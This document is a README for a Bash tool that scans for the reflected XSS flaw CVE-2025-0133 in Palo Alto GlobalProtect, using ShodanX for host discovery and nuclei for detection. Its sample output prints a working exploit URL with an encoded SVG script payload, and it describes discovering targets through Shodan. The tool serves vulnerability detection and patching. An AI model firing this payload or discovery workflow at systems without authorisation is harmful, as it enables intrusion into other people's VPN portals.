A Bash-based automated scanner tool for detecting the CVE-2025-0133 Reflected XSS vulnerability in Palo Alto GlobalProtect Gateway & Portal using nuclei and shodanx.
Author:
Date: 2025-06-23
Severity: Medium
CVE ID: CVE-2025-0133
Vulnerability Type: Reflected Cross-Site Scripting (XSS)
Tested Against: Palo Alto Networks GlobalProtect Portal (PAN-OS)
This tool helps penetration testers and security researchers quickly identify vulnerable domains or IPs related to the CVE-2025-0133 issue.
It leverages nuclei templates and Shodan query integration (shodanx) to find and scan targets efficiently.
- Automatically detects if input is a single domain or a file containing multiple domains/IPs
- Runs
shodanxon single domains to gather related hosts - Uses
nucleiwith a custom CVE-2025-0133 template to scan targets - Displays scan results in a clean tabular format on the command line
- Shows scan start and end times
- Prompts to save results in both
.txtand.jsonformats - Built-in help and usage instructions
- Linux environment with Bash shell
- nuclei installed and accessible in
$PATH - shodanx) installed and configured
- The
CVE-2025-0133nuclei template file located at:
/home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml(update path as needed)
🔹 1. Install ShodanX
pip install git+https://github.com/RevoltSecurities/ShodanX If the error shows: "error: externally-managed-environment"
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
⚠️ Note:--break-system-packagesoption is needed on some systems (especially Debian/Ubuntu) to allow pip to install packages outside a virtual environment without permission errors.
👉 Make sure shodanx is available in your $PATH.
You can test it with:
shodanx -h🔹 2. Install Nuclei
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latestCheck if installed:
nuclei -versionThen update the templates:
nuclei -update-templates┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h
Usage: ./cve20250133.sh <domain-or-file>
Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.
Options:
-h, --help, help Show this help message and exit.
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Input is a single domain: domain.com — Running ShodanX first
_ _
| | | (_\ /
, | | __ __| __, _ _ \/
/ \_|/ \ / \_/ | / | / |/ | /\
\/ | |_/\__/ \_/|_/\_/|_/ | |_/ _/ \_/
- RevoltSecurities
[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt
Scan Start Time: 2025-06-24 16:36:37
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------Reflected Cross-Site Scripting (XSS) vulnerability in Palo Alto GlobalProtect Gateway & Portal allowing attackers to inject malicious scripts via crafted requests. Patch your systems by updating to the latest Palo Alto Networks releases to mitigate this issue.
This project is licensed under the MIT License - see the LICENSE file for details.